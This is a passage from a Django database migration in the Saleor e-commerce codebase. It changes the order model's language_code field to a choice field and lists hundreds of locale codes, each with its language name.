dc3b3885ca9501fe86d36963da993632c7abb1cf | 3a533d1503f9a1c767ecd3a29885add49fff4f18 | /saleor/order/migrations/0114_alter_order_language_code.py | 2a11cde671ec67e4f55975abffa65b13ea276bfa | [
"BSD-3-Clause"
] | permissive | jonserna/saleor | 0c1e4297e10e0a0ce530b5296f6b4488f524c145 | b7d1b320e096d99567d3fa7bc4780862809d19ac | refs/heads/master | 2023-06-25T17:25:17.459739 | 2023-06-19T14:05:41 | 2023-06-19T14:05:41 | 186,167,599 | 0 | 0 | BSD-3-Clause | 2019-12-29T15:46:40 | 2019-05-11T18:21:31 | TypeScript | UTF-8 | Python | false | false | 40,331 | py | # Generated by Django 3.2.6 on 2021-08-17 11:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("order", "0113_orderevent_app"),
]
operations = [
migrations.AlterField(
model_name="order",
name="language_code",
field=models.CharField(
choices=[
("af", "Afrikaans"),
("af-NA", "Afrikaans (Namibia)"),
("af-ZA", "Afrikaans (South Africa)"),
("agq", "Aghem"),
("agq-CM", "Aghem (Cameroon)"),
("ak", "Akan"),
("ak-GH", "Akan (Ghana)"),
("am", "Amharic"),
("am-ET", "Amharic (Ethiopia)"),
("ar", "Arabic"),
("ar-AE", "Arabic (United Arab Emirates)"),
("ar-BH", "Arabic (Bahrain)"),
("ar-DJ", "Arabic (Djibouti)"),
("ar-DZ", "Arabic (Algeria)"),
("ar-EG", "Arabic (Egypt)"),
("ar-EH", "Arabic (Western Sahara)"),
("ar-ER", "Arabic (Eritrea)"),
("ar-IL", "Arabic (Israel)"),
("ar-IQ", "Arabic (Iraq)"),
("ar-JO", "Arabic (Jordan)"),
("ar-KM", "Arabic (Comoros)"),
("ar-KW", "Arabic (Kuwait)"),
("ar-LB", "Arabic (Lebanon)"),
("ar-LY", "Arabic (Libya)"),
("ar-MA", "Arabic (Morocco)"),
("ar-MR", "Arabic (Mauritania)"),
("ar-OM", "Arabic (Oman)"),
("ar-PS", "Arabic (Palestinian Territories)"),
("ar-QA", "Arabic (Qatar)"),
("ar-SA", "Arabic (Saudi Arabia)"),
("ar-SD", "Arabic (Sudan)"),
("ar-SO", "Arabic (Somalia)"),
("ar-SS", "Arabic (South Sudan)"),
("ar-SY", "Arabic (Syria)"),
("ar-TD", "Arabic (Chad)"),
("ar-TN", "Arabic (Tunisia)"),
("ar-YE", "Arabic (Yemen)"),
("as", "Assamese"),
("as-IN", "Assamese (India)"),
("asa", "Asu"),
("asa-TZ", "Asu (Tanzania)"),
("ast", "Asturian"),
("ast-ES", "Asturian (Spain)"),
("az", "Azerbaijani"),
("az-Cyrl", "Azerbaijani (Cyrillic)"),
("az-Cyrl-AZ", "Azerbaijani (Cyrillic, Azerbaijan)"),
("az-Latn", "Azerbaijani (Latin)"),
("az-Latn-AZ", "Azerbaijani (Latin, Azerbaijan)"),
("bas", "Basaa"),
("bas-CM", "Basaa (Cameroon)"),
("be", "Belarusian"),
("be-BY", "Belarusian (Belarus)"),
("bem", "Bemba"),
("bem-ZM", "Bemba (Zambia)"),
("bez", "Bena"),
("bez-TZ", "Bena (Tanzania)"),
("bg", "Bulgarian"),
("bg-BG", "Bulgarian (Bulgaria)"),
("bm", "Bambara"),
("bm-ML", "Bambara (Mali)"),
("bn", "Bangla"),
("bn-BD", "Bangla (Bangladesh)"),
("bn-IN", "Bangla (India)"),
("bo", "Tibetan"),
("bo-CN", "Tibetan (China)"),
("bo-IN", "Tibetan (India)"),
("br", "Breton"),
("br-FR", "Breton (France)"),
("brx", "Bodo"),
("brx-IN", "Bodo (India)"),
("bs", "Bosnian"),
("bs-Cyrl", "Bosnian (Cyrillic)"),
("bs-Cyrl-BA", "Bosnian (Cyrillic, Bosnia & Herzegovina)"),
("bs-Latn", "Bosnian (Latin)"),
("bs-Latn-BA", "Bosnian (Latin, Bosnia & Herzegovina)"),
("ca", "Catalan"),
("ca-AD", "Catalan (Andorra)"),
("ca-ES", "Catalan (Spain)"),
("ca-ES-VALENCIA", "Catalan (Spain, Valencian)"),
("ca-FR", "Catalan (France)"),
("ca-IT", "Catalan (Italy)"),
("ccp", "Chakma"),
("ccp-BD", "Chakma (Bangladesh)"),
("ccp-IN", "Chakma (India)"),
("ce", "Chechen"),
("ce-RU", "Chechen (Russia)"),
("ceb", "Cebuano"),
("ceb-PH", "Cebuano (Philippines)"),
("cgg", "Chiga"),
("cgg-UG", "Chiga (Uganda)"),
("chr", "Cherokee"),
("chr-US", "Cherokee (United States)"),
("ckb", "Central Kurdish"),
("ckb-IQ", "Central Kurdish (Iraq)"),
("ckb-IR", "Central Kurdish (Iran)"),
("cs", "Czech"),
("cs-CZ", "Czech (Czechia)"),
("cu", "Church Slavic"),
("cu-RU", "Church Slavic (Russia)"),
("cy", "Welsh"),
("cy-GB", "Welsh (United Kingdom)"),
("da", "Danish"),
("da-DK", "Danish (Denmark)"),
("da-GL", "Danish (Greenland)"),
("dav", "Taita"),
("dav-KE", "Taita (Kenya)"),
("de", "German"),
("de-AT", "German (Austria)"),
("de-BE", "German (Belgium)"),
("de-CH", "German (Switzerland)"),
("de-DE", "German (Germany)"),
("de-IT", "German (Italy)"),
("de-LI", "German (Liechtenstein)"),
("de-LU", "German (Luxembourg)"),
("dje", "Zarma"),
("dje-NE", "Zarma (Niger)"),
("dsb", "Lower Sorbian"),
("dsb-DE", "Lower Sorbian (Germany)"),
("dua", "Duala"),
("dua-CM", "Duala (Cameroon)"),
("dyo", "Jola-Fonyi"),
("dyo-SN", "Jola-Fonyi (Senegal)"),
("dz", "Dzongkha"),
("dz-BT", "Dzongkha (Bhutan)"),
("ebu", "Embu"),
("ebu-KE", "Embu (Kenya)"),
("ee", "Ewe"),
("ee-GH", "Ewe (Ghana)"),
("ee-TG", "Ewe (Togo)"),
("el", "Greek"),
("el-CY", "Greek (Cyprus)"),
("el-GR", "Greek (Greece)"),
("en", "English"),
("en-AE", "English (United Arab Emirates)"),
("en-AG", "English (Antigua & Barbuda)"),
("en-AI", "English (Anguilla)"),
("en-AS", "English (American Samoa)"),
("en-AT", "English (Austria)"),
("en-AU", "English (Australia)"),
("en-BB", "English (Barbados)"),
("en-BE", "English (Belgium)"),
("en-BI", "English (Burundi)"),
("en-BM", "English (Bermuda)"),
("en-BS", "English (Bahamas)"),
("en-BW", "English (Botswana)"),
("en-BZ", "English (Belize)"),
("en-CA", "English (Canada)"),
("en-CC", "English (Cocos (Keeling) Islands)"),
("en-CH", "English (Switzerland)"),
("en-CK", "English (Cook Islands)"),
("en-CM", "English (Cameroon)"),
("en-CX", "English (Christmas Island)"),
("en-CY", "English (Cyprus)"),
("en-DE", "English (Germany)"),
("en-DG", "English (Diego Garcia)"),
("en-DK", "English (Denmark)"),
("en-DM", "English (Dominica)"),
("en-ER", "English (Eritrea)"),
("en-FI", "English (Finland)"),
("en-FJ", "English (Fiji)"),
("en-FK", "English (Falkland Islands)"),
("en-FM", "English (Micronesia)"),
("en-GB", "English (United Kingdom)"),
("en-GD", "English (Grenada)"),
("en-GG", "English (Guernsey)"),
("en-GH", "English (Ghana)"),
("en-GI", "English (Gibraltar)"),
("en-GM", "English (Gambia)"),
("en-GU", "English (Guam)"),
("en-GY", "English (Guyana)"),
("en-HK", "English (Hong Kong SAR China)"),
("en-IE", "English (Ireland)"),
("en-IL", "English (Israel)"),
("en-IM", "English (Isle of Man)"),
("en-IN", "English (India)"),
("en-IO", "English (British Indian Ocean Territory)"),
("en-JE", "English (Jersey)"),
("en-JM", "English (Jamaica)"),
("en-KE", "English (Kenya)"),
("en-KI", "English (Kiribati)"),
("en-KN", "English (St. Kitts & Nevis)"),
("en-KY", "English (Cayman Islands)"),
("en-LC", "English (St. Lucia)"),
("en-LR", "English (Liberia)"),
("en-LS", "English (Lesotho)"),
("en-MG", "English (Madagascar)"),
("en-MH", "English (Marshall Islands)"),
("en-MO", "English (Macao SAR China)"),
("en-MP", "English (Northern Mariana Islands)"),
("en-MS", "English (Montserrat)"),
("en-MT", "English (Malta)"),
("en-MU", "English (Mauritius)"),
("en-MW", "English (Malawi)"),
("en-MY", "English (Malaysia)"),
("en-NA", "English (Namibia)"),
("en-NF", "English (Norfolk Island)"),
("en-NG", "English (Nigeria)"),
("en-NL", "English (Netherlands)"),
("en-NR", "English (Nauru)"),
("en-NU", "English (Niue)"),
("en-NZ", "English (New Zealand)"),
("en-PG", "English (Papua New Guinea)"),
("en-PH", "English (Philippines)"),
("en-PK", "English (Pakistan)"),
("en-PN", "English (Pitcairn Islands)"),
("en-PR", "English (Puerto Rico)"),
("en-PW", "English (Palau)"),
("en-RW", "English (Rwanda)"),
("en-SB", "English (Solomon Islands)"),
("en-SC", "English (Seychelles)"),
("en-SD", "English (Sudan)"),
("en-SE", "English (Sweden)"),
("en-SG", "English (Singapore)"),
("en-SH", "English (St. Helena)"),
("en-SI", "English (Slovenia)"),
("en-SL", "English (Sierra Leone)"),
("en-SS", "English (South Sudan)"),
("en-SX", "English (Sint Maarten)"),
("en-SZ", "English (Eswatini)"),
("en-TC", "English (Turks & Caicos Islands)"),
("en-TK", "English (Tokelau)"),
("en-TO", "English (Tonga)"),
("en-TT", "English (Trinidad & Tobago)"),
("en-TV", "English (Tuvalu)"),
("en-TZ", "English (Tanzania)"),
("en-UG", "English (Uganda)"),
("en-UM", "English (U.S. Outlying Islands)"),
("en-US", "English (United States)"),
("en-VC", "English (St. Vincent & Grenadines)"),
("en-VG", "English (British Virgin Islands)"),
("en-VI", "English (U.S. Virgin Islands)"),
("en-VU", "English (Vanuatu)"),
("en-WS", "English (Samoa)"),
("en-ZA", "English (South Africa)"),
("en-ZM", "English (Zambia)"),
("en-ZW", "English (Zimbabwe)"),
("eo", "Esperanto"),
("es", "Spanish"),
("es-AR", "Spanish (Argentina)"),
("es-BO", "Spanish (Bolivia)"),
("es-BR", "Spanish (Brazil)"),
("es-BZ", "Spanish (Belize)"),
("es-CL", "Spanish (Chile)"),
("es-CO", "Spanish (Colombia)"),
("es-CR", "Spanish (Costa Rica)"),
("es-CU", "Spanish (Cuba)"),
("es-DO", "Spanish (Dominican Republic)"),
("es-EA", "Spanish (Ceuta & Melilla)"),
("es-EC", "Spanish (Ecuador)"),
("es-ES", "Spanish (Spain)"),
("es-GQ", "Spanish (Equatorial Guinea)"),
("es-GT", "Spanish (Guatemala)"),
("es-HN", "Spanish (Honduras)"),
("es-IC", "Spanish (Canary Islands)"),
("es-MX", "Spanish (Mexico)"),
("es-NI", "Spanish (Nicaragua)"),
("es-PA", "Spanish (Panama)"),
("es-PE", "Spanish (Peru)"),
("es-PH", "Spanish (Philippines)"),
("es-PR", "Spanish (Puerto Rico)"),
("es-PY", "Spanish (Paraguay)"),
("es-SV", "Spanish (El Salvador)"),
("es-US", "Spanish (United States)"),
("es-UY", "Spanish (Uruguay)"),
("es-VE", "Spanish (Venezuela)"),
("et", "Estonian"),
("et-EE", "Estonian (Estonia)"),
("eu", "Basque"),
("eu-ES", "Basque (Spain)"),
("ewo", "Ewondo"),
("ewo-CM", "Ewondo (Cameroon)"),
("fa", "Persian"),
("fa-AF", "Persian (Afghanistan)"),
("fa-IR", "Persian (Iran)"),
("ff", "Fulah"),
("ff-Adlm", "Fulah (Adlam)"),
("ff-Adlm-BF", "Fulah (Adlam, Burkina Faso)"),
("ff-Adlm-CM", "Fulah (Adlam, Cameroon)"),
("ff-Adlm-GH", "Fulah (Adlam, Ghana)"),
("ff-Adlm-GM", "Fulah (Adlam, Gambia)"),
("ff-Adlm-GN", "Fulah (Adlam, Guinea)"),
("ff-Adlm-GW", "Fulah (Adlam, Guinea-Bissau)"),
("ff-Adlm-LR", "Fulah (Adlam, Liberia)"),
("ff-Adlm-MR", "Fulah (Adlam, Mauritania)"),
("ff-Adlm-NE", "Fulah (Adlam, Niger)"),
("ff-Adlm-NG", "Fulah (Adlam, Nigeria)"),
("ff-Adlm-SL", "Fulah (Adlam, Sierra Leone)"),
("ff-Adlm-SN", "Fulah (Adlam, Senegal)"),
("ff-Latn", "Fulah (Latin)"),
("ff-Latn-BF", "Fulah (Latin, Burkina Faso)"),
("ff-Latn-CM", "Fulah (Latin, Cameroon)"),
("ff-Latn-GH", "Fulah (Latin, Ghana)"),
("ff-Latn-GM", "Fulah (Latin, Gambia)"),
("ff-Latn-GN", "Fulah (Latin, Guinea)"),
("ff-Latn-GW", "Fulah (Latin, Guinea-Bissau)"),
("ff-Latn-LR", "Fulah (Latin, Liberia)"),
("ff-Latn-MR", "Fulah (Latin, Mauritania)"),
("ff-Latn-NE", "Fulah (Latin, Niger)"),
("ff-Latn-NG", "Fulah (Latin, Nigeria)"),
("ff-Latn-SL", "Fulah (Latin, Sierra Leone)"),
("ff-Latn-SN", "Fulah (Latin, Senegal)"),
("fi", "Finnish"),
("fi-FI", "Finnish (Finland)"),
("fil", "Filipino"),
("fil-PH", "Filipino (Philippines)"),
("fo", "Faroese"),
("fo-DK", "Faroese (Denmark)"),
("fo-FO", "Faroese (Faroe Islands)"),
("fr", "French"),
("fr-BE", "French (Belgium)"),
("fr-BF", "French (Burkina Faso)"),
("fr-BI", "French (Burundi)"),
("fr-BJ", "French (Benin)"),
("fr-BL", "French (St. Barthélemy)"),
("fr-CA", "French (Canada)"),
("fr-CD", "French (Congo - Kinshasa)"),
("fr-CF", "French (Central African Republic)"),
("fr-CG", "French (Congo - Brazzaville)"),
("fr-CH", "French (Switzerland)"),
("fr-CI", "French (Côte d’Ivoire)"),
("fr-CM", "French (Cameroon)"),
("fr-DJ", "French (Djibouti)"),
("fr-DZ", "French (Algeria)"),
("fr-FR", "French (France)"),
("fr-GA", "French (Gabon)"),
("fr-GF", "French (French Guiana)"),
("fr-GN", "French (Guinea)"),
("fr-GP", "French (Guadeloupe)"),
("fr-GQ", "French (Equatorial Guinea)"),
("fr-HT", "French (Haiti)"),
("fr-KM", "French (Comoros)"),
("fr-LU", "French (Luxembourg)"),
("fr-MA", "French (Morocco)"),
("fr-MC", "French (Monaco)"),
("fr-MF", "French (St. Martin)"),
("fr-MG", "French (Madagascar)"),
("fr-ML", "French (Mali)"),
("fr-MQ", "French (Martinique)"),
("fr-MR", "French (Mauritania)"),
("fr-MU", "French (Mauritius)"),
("fr-NC", "French (New Caledonia)"),
("fr-NE", "French (Niger)"),
("fr-PF", "French (French Polynesia)"),
("fr-PM", "French (St. Pierre & Miquelon)"),
("fr-RE", "French (Réunion)"),
("fr-RW", "French (Rwanda)"),
("fr-SC", "French (Seychelles)"),
("fr-SN", "French (Senegal)"),
("fr-SY", "French (Syria)"),
("fr-TD", "French (Chad)"),
("fr-TG", "French (Togo)"),
("fr-TN", "French (Tunisia)"),
("fr-VU", "French (Vanuatu)"),
("fr-WF", "French (Wallis & Futuna)"),
("fr-YT", "French (Mayotte)"),
("fur", "Friulian"),
("fur-IT", "Friulian (Italy)"),
("fy", "Western Frisian"),
("fy-NL", "Western Frisian (Netherlands)"),
("ga", "Irish"),
("ga-GB", "Irish (United Kingdom)"),
("ga-IE", "Irish (Ireland)"),
("gd", "Scottish Gaelic"),
("gd-GB", "Scottish Gaelic (United Kingdom)"),
("gl", "Galician"),
("gl-ES", "Galician (Spain)"),
("gsw", "Swiss German"),
("gsw-CH", "Swiss German (Switzerland)"),
("gsw-FR", "Swiss German (France)"),
("gsw-LI", "Swiss German (Liechtenstein)"),
("gu", "Gujarati"),
("gu-IN", "Gujarati (India)"),
("guz", "Gusii"),
("guz-KE", "Gusii (Kenya)"),
("gv", "Manx"),
("gv-IM", "Manx (Isle of Man)"),
("ha", "Hausa"),
("ha-GH", "Hausa (Ghana)"),
("ha-NE", "Hausa (Niger)"),
("ha-NG", "Hausa (Nigeria)"),
("haw", "Hawaiian"),
("haw-US", "Hawaiian (United States)"),
("he", "Hebrew"),
("he-IL", "Hebrew (Israel)"),
("hi", "Hindi"),
("hi-IN", "Hindi (India)"),
("hr", "Croatian"),
("hr-BA", "Croatian (Bosnia & Herzegovina)"),
("hr-HR", "Croatian (Croatia)"),
("hsb", "Upper Sorbian"),
("hsb-DE", "Upper Sorbian (Germany)"),
("hu", "Hungarian"),
("hu-HU", "Hungarian (Hungary)"),
("hy", "Armenian"),
("hy-AM", "Armenian (Armenia)"),
("ia", "Interlingua"),
("id", "Indonesian"),
("id-ID", "Indonesian (Indonesia)"),
("ig", "Igbo"),
("ig-NG", "Igbo (Nigeria)"),
("ii", "Sichuan Yi"),
("ii-CN", "Sichuan Yi (China)"),
("is", "Icelandic"),
("is-IS", "Icelandic (Iceland)"),
("it", "Italian"),
("it-CH", "Italian (Switzerland)"),
("it-IT", "Italian (Italy)"),
("it-SM", "Italian (San Marino)"),
("it-VA", "Italian (Vatican City)"),
("ja", "Japanese"),
("ja-JP", "Japanese (Japan)"),
("jgo", "Ngomba"),
("jgo-CM", "Ngomba (Cameroon)"),
("jmc", "Machame"),
("jmc-TZ", "Machame (Tanzania)"),
("jv", "Javanese"),
("jv-ID", "Javanese (Indonesia)"),
("ka", "Georgian"),
("ka-GE", "Georgian (Georgia)"),
("kab", "Kabyle"),
("kab-DZ", "Kabyle (Algeria)"),
("kam", "Kamba"),
("kam-KE", "Kamba (Kenya)"),
("kde", "Makonde"),
("kde-TZ", "Makonde (Tanzania)"),
("kea", "Kabuverdianu"),
("kea-CV", "Kabuverdianu (Cape Verde)"),
("khq", "Koyra Chiini"),
("khq-ML", "Koyra Chiini (Mali)"),
("ki", "Kikuyu"),
("ki-KE", "Kikuyu (Kenya)"),
("kk", "Kazakh"),
("kk-KZ", "Kazakh (Kazakhstan)"),
("kkj", "Kako"),
("kkj-CM", "Kako (Cameroon)"),
("kl", "Kalaallisut"),
("kl-GL", "Kalaallisut (Greenland)"),
("kln", "Kalenjin"),
("kln-KE", "Kalenjin (Kenya)"),
("km", "Khmer"),
("km-KH", "Khmer (Cambodia)"),
("kn", "Kannada"),
("kn-IN", "Kannada (India)"),
("ko", "Korean"),
("ko-KP", "Korean (North Korea)"),
("ko-KR", "Korean (South Korea)"),
("kok", "Konkani"),
("kok-IN", "Konkani (India)"),
("ks", "Kashmiri"),
("ks-Arab", "Kashmiri (Arabic)"),
("ks-Arab-IN", "Kashmiri (Arabic, India)"),
("ksb", "Shambala"),
("ksb-TZ", "Shambala (Tanzania)"),
("ksf", "Bafia"),
("ksf-CM", "Bafia (Cameroon)"),
("ksh", "Colognian"),
("ksh-DE", "Colognian (Germany)"),
("ku", "Kurdish"),
("ku-TR", "Kurdish (Turkey)"),
("kw", "Cornish"),
("kw-GB", "Cornish (United Kingdom)"),
("ky", "Kyrgyz"),
("ky-KG", "Kyrgyz (Kyrgyzstan)"),
("lag", "Langi"),
("lag-TZ", "Langi (Tanzania)"),
("lb", "Luxembourgish"),
("lb-LU", "Luxembourgish (Luxembourg)"),
("lg", "Ganda"),
("lg-UG", "Ganda (Uganda)"),
("lkt", "Lakota"),
("lkt-US", "Lakota (United States)"),
("ln", "Lingala"),
("ln-AO", "Lingala (Angola)"),
("ln-CD", "Lingala (Congo - Kinshasa)"),
("ln-CF", "Lingala (Central African Republic)"),
("ln-CG", "Lingala (Congo - Brazzaville)"),
("lo", "Lao"),
("lo-LA", "Lao (Laos)"),
("lrc", "Northern Luri"),
("lrc-IQ", "Northern Luri (Iraq)"),
("lrc-IR", "Northern Luri (Iran)"),
("lt", "Lithuanian"),
("lt-LT", "Lithuanian (Lithuania)"),
("lu", "Luba-Katanga"),
("lu-CD", "Luba-Katanga (Congo - Kinshasa)"),
("luo", "Luo"),
("luo-KE", "Luo (Kenya)"),
("luy", "Luyia"),
("luy-KE", "Luyia (Kenya)"),
("lv", "Latvian"),
("lv-LV", "Latvian (Latvia)"),
("mai", "Maithili"),
("mai-IN", "Maithili (India)"),
("mas", "Masai"),
("mas-KE", "Masai (Kenya)"),
("mas-TZ", "Masai (Tanzania)"),
("mer", "Meru"),
("mer-KE", "Meru (Kenya)"),
("mfe", "Morisyen"),
("mfe-MU", "Morisyen (Mauritius)"),
("mg", "Malagasy"),
("mg-MG", "Malagasy (Madagascar)"),
("mgh", "Makhuwa-Meetto"),
("mgh-MZ", "Makhuwa-Meetto (Mozambique)"),
("mgo", "Metaʼ"),
("mgo-CM", "Metaʼ (Cameroon)"),
("mi", "Maori"),
("mi-NZ", "Maori (New Zealand)"),
("mk", "Macedonian"),
("mk-MK", "Macedonian (North Macedonia)"),
("ml", "Malayalam"),
("ml-IN", "Malayalam (India)"),
("mn", "Mongolian"),
("mn-MN", "Mongolian (Mongolia)"),
("mni", "Manipuri"),
("mni-Beng", "Manipuri (Bangla)"),
("mni-Beng-IN", "Manipuri (Bangla, India)"),
("mr", "Marathi"),
("mr-IN", "Marathi (India)"),
("ms", "Malay"),
("ms-BN", "Malay (Brunei)"),
("ms-ID", "Malay (Indonesia)"),
("ms-MY", "Malay (Malaysia)"),
("ms-SG", "Malay (Singapore)"),
("mt", "Maltese"),
("mt-MT", "Maltese (Malta)"),
("mua", "Mundang"),
("mua-CM", "Mundang (Cameroon)"),
("my", "Burmese"),
("my-MM", "Burmese (Myanmar (Burma))"),
("mzn", "Mazanderani"),
("mzn-IR", "Mazanderani (Iran)"),
("naq", "Nama"),
("naq-NA", "Nama (Namibia)"),
("nb", "Norwegian Bokmål"),
("nb-NO", "Norwegian Bokmål (Norway)"),
("nb-SJ", "Norwegian Bokmål (Svalbard & Jan Mayen)"),
("nd", "North Ndebele"),
("nd-ZW", "North Ndebele (Zimbabwe)"),
("nds", "Low German"),
("nds-DE", "Low German (Germany)"),
("nds-NL", "Low German (Netherlands)"),
("ne", "Nepali"),
("ne-IN", "Nepali (India)"),
("ne-NP", "Nepali (Nepal)"),
("nl", "Dutch"),
("nl-AW", "Dutch (Aruba)"),
("nl-BE", "Dutch (Belgium)"),
("nl-BQ", "Dutch (Caribbean Netherlands)"),
("nl-CW", "Dutch (Curaçao)"),
("nl-NL", "Dutch (Netherlands)"),
("nl-SR", "Dutch (Suriname)"),
("nl-SX", "Dutch (Sint Maarten)"),
("nmg", "Kwasio"),
("nmg-CM", "Kwasio (Cameroon)"),
("nn", "Norwegian Nynorsk"),
("nn-NO", "Norwegian Nynorsk (Norway)"),
("nnh", "Ngiemboon"),
("nnh-CM", "Ngiemboon (Cameroon)"),
("nus", "Nuer"),
("nus-SS", "Nuer (South Sudan)"),
("nyn", "Nyankole"),
("nyn-UG", "Nyankole (Uganda)"),
("om", "Oromo"),
("om-ET", "Oromo (Ethiopia)"),
("om-KE", "Oromo (Kenya)"),
("or", "Odia"),
("or-IN", "Odia (India)"),
("os", "Ossetic"),
("os-GE", "Ossetic (Georgia)"),
("os-RU", "Ossetic (Russia)"),
("pa", "Punjabi"),
("pa-Arab", "Punjabi (Arabic)"),
("pa-Arab-PK", "Punjabi (Arabic, Pakistan)"),
("pa-Guru", "Punjabi (Gurmukhi)"),
("pa-Guru-IN", "Punjabi (Gurmukhi, India)"),
("pcm", "Nigerian Pidgin"),
("pcm-NG", "Nigerian Pidgin (Nigeria)"),
("pl", "Polish"),
("pl-PL", "Polish (Poland)"),
("prg", "Prussian"),
("ps", "Pashto"),
("ps-AF", "Pashto (Afghanistan)"),
("ps-PK", "Pashto (Pakistan)"),
("pt", "Portuguese"),
("pt-AO", "Portuguese (Angola)"),
("pt-BR", "Portuguese (Brazil)"),
("pt-CH", "Portuguese (Switzerland)"),
("pt-CV", "Portuguese (Cape Verde)"),
("pt-GQ", "Portuguese (Equatorial Guinea)"),
("pt-GW", "Portuguese (Guinea-Bissau)"),
("pt-LU", "Portuguese (Luxembourg)"),
("pt-MO", "Portuguese (Macao SAR China)"),
("pt-MZ", "Portuguese (Mozambique)"),
("pt-PT", "Portuguese (Portugal)"),
("pt-ST", "Portuguese (São Tomé & Príncipe)"),
("pt-TL", "Portuguese (Timor-Leste)"),
("qu", "Quechua"),
("qu-BO", "Quechua (Bolivia)"),
("qu-EC", "Quechua (Ecuador)"),
("qu-PE", "Quechua (Peru)"),
("rm", "Romansh"),
("rm-CH", "Romansh (Switzerland)"),
("rn", "Rundi"),
("rn-BI", "Rundi (Burundi)"),
("ro", "Romanian"),
("ro-MD", "Romanian (Moldova)"),
("ro-RO", "Romanian (Romania)"),
("rof", "Rombo"),
("rof-TZ", "Rombo (Tanzania)"),
("ru", "Russian"),
("ru-BY", "Russian (Belarus)"),
("ru-KG", "Russian (Kyrgyzstan)"),
("ru-KZ", "Russian (Kazakhstan)"),
("ru-MD", "Russian (Moldova)"),
("ru-RU", "Russian (Russia)"),
("ru-UA", "Russian (Ukraine)"),
("rw", "Kinyarwanda"),
("rw-RW", "Kinyarwanda (Rwanda)"),
("rwk", "Rwa"),
("rwk-TZ", "Rwa (Tanzania)"),
("sah", "Sakha"),
("sah-RU", "Sakha (Russia)"),
("saq", "Samburu"),
("saq-KE", "Samburu (Kenya)"),
("sat", "Santali"),
("sat-Olck", "Santali (Ol Chiki)"),
("sat-Olck-IN", "Santali (Ol Chiki, India)"),
("sbp", "Sangu"),
("sbp-TZ", "Sangu (Tanzania)"),
("sd", "Sindhi"),
("sd-Arab", "Sindhi (Arabic)"),
("sd-Arab-PK", "Sindhi (Arabic, Pakistan)"),
("sd-Deva", "Sindhi (Devanagari)"),
("sd-Deva-IN", "Sindhi (Devanagari, India)"),
("se", "Northern Sami"),
("se-FI", "Northern Sami (Finland)"),
("se-NO", "Northern Sami (Norway)"),
("se-SE", "Northern Sami (Sweden)"),
("seh", "Sena"),
("seh-MZ", "Sena (Mozambique)"),
("ses", "Koyraboro Senni"),
("ses-ML", "Koyraboro Senni (Mali)"),
("sg", "Sango"),
("sg-CF", "Sango (Central African Republic)"),
("shi", "Tachelhit"),
("shi-Latn", "Tachelhit (Latin)"),
("shi-Latn-MA", "Tachelhit (Latin, Morocco)"),
("shi-Tfng", "Tachelhit (Tifinagh)"),
("shi-Tfng-MA", "Tachelhit (Tifinagh, Morocco)"),
("si", "Sinhala"),
("si-LK", "Sinhala (Sri Lanka)"),
("sk", "Slovak"),
("sk-SK", "Slovak (Slovakia)"),
("sl", "Slovenian"),
("sl-SI", "Slovenian (Slovenia)"),
("smn", "Inari Sami"),
("smn-FI", "Inari Sami (Finland)"),
("sn", "Shona"),
("sn-ZW", "Shona (Zimbabwe)"),
("so", "Somali"),
("so-DJ", "Somali (Djibouti)"),
("so-ET", "Somali (Ethiopia)"),
("so-KE", "Somali (Kenya)"),
("so-SO", "Somali (Somalia)"),
("sq", "Albanian"),
("sq-AL", "Albanian (Albania)"),
("sq-MK", "Albanian (North Macedonia)"),
("sq-XK", "Albanian (Kosovo)"),
("sr", "Serbian"),
("sr-Cyrl", "Serbian (Cyrillic)"),
("sr-Cyrl-BA", "Serbian (Cyrillic, Bosnia & Herzegovina)"),
("sr-Cyrl-ME", "Serbian (Cyrillic, Montenegro)"),
("sr-Cyrl-RS", "Serbian (Cyrillic, Serbia)"),
("sr-Cyrl-XK", "Serbian (Cyrillic, Kosovo)"),
("sr-Latn", "Serbian (Latin)"),
("sr-Latn-BA", "Serbian (Latin, Bosnia & Herzegovina)"),
("sr-Latn-ME", "Serbian (Latin, Montenegro)"),
("sr-Latn-RS", "Serbian (Latin, Serbia)"),
("sr-Latn-XK", "Serbian (Latin, Kosovo)"),
("su", "Sundanese"),
("su-Latn", "Sundanese (Latin)"),
("su-Latn-ID", "Sundanese (Latin, Indonesia)"),
("sv", "Swedish"),
("sv-AX", "Swedish (Åland Islands)"),
("sv-FI", "Swedish (Finland)"),
("sv-SE", "Swedish (Sweden)"),
("sw", "Swahili"),
("sw-CD", "Swahili (Congo - Kinshasa)"),
("sw-KE", "Swahili (Kenya)"),
("sw-TZ", "Swahili (Tanzania)"),
("sw-UG", "Swahili (Uganda)"),
("ta", "Tamil"),
("ta-IN", "Tamil (India)"),
("ta-LK", "Tamil (Sri Lanka)"),
("ta-MY", "Tamil (Malaysia)"),
("ta-SG", "Tamil (Singapore)"),
("te", "Telugu"),
("te-IN", "Telugu (India)"),
("teo", "Teso"),
("teo-KE", "Teso (Kenya)"),
("teo-UG", "Teso (Uganda)"),
("tg", "Tajik"),
("tg-TJ", "Tajik (Tajikistan)"),
("th", "Thai"),
("th-TH", "Thai (Thailand)"),
("ti", "Tigrinya"),
("ti-ER", "Tigrinya (Eritrea)"),
("ti-ET", "Tigrinya (Ethiopia)"),
("tk", "Turkmen"),
("tk-TM", "Turkmen (Turkmenistan)"),
("to", "Tongan"),
("to-TO", "Tongan (Tonga)"),
("tr", "Turkish"),
("tr-CY", "Turkish (Cyprus)"),
("tr-TR", "Turkish (Turkey)"),
("tt", "Tatar"),
("tt-RU", "Tatar (Russia)"),
("twq", "Tasawaq"),
("twq-NE", "Tasawaq (Niger)"),
("tzm", "Central Atlas Tamazight"),
("tzm-MA", "Central Atlas Tamazight (Morocco)"),
("ug", "Uyghur"),
("ug-CN", "Uyghur (China)"),
("uk", "Ukrainian"),
("uk-UA", "Ukrainian (Ukraine)"),
("ur", "Urdu"),
("ur-IN", "Urdu (India)"),
("ur-PK", "Urdu (Pakistan)"),
("uz", "Uzbek"),
("uz-Arab", "Uzbek (Arabic)"),
("uz-Arab-AF", "Uzbek (Arabic, Afghanistan)"),
("uz-Cyrl", "Uzbek (Cyrillic)"),
("uz-Cyrl-UZ", "Uzbek (Cyrillic, Uzbekistan)"),
("uz-Latn", "Uzbek (Latin)"),
("uz-Latn-UZ", "Uzbek (Latin, Uzbekistan)"),
("vai", "Vai"),
("vai-Latn", "Vai (Latin)"),
("vai-Latn-LR", "Vai (Latin, Liberia)"),
("vai-Vaii", "Vai (Vai)"),
("vai-Vaii-LR", "Vai (Vai, Liberia)"),
("vi", "Vietnamese"),
("vi-VN", "Vietnamese (Vietnam)"),
("vo", "Volapük"),
("vun", "Vunjo"),
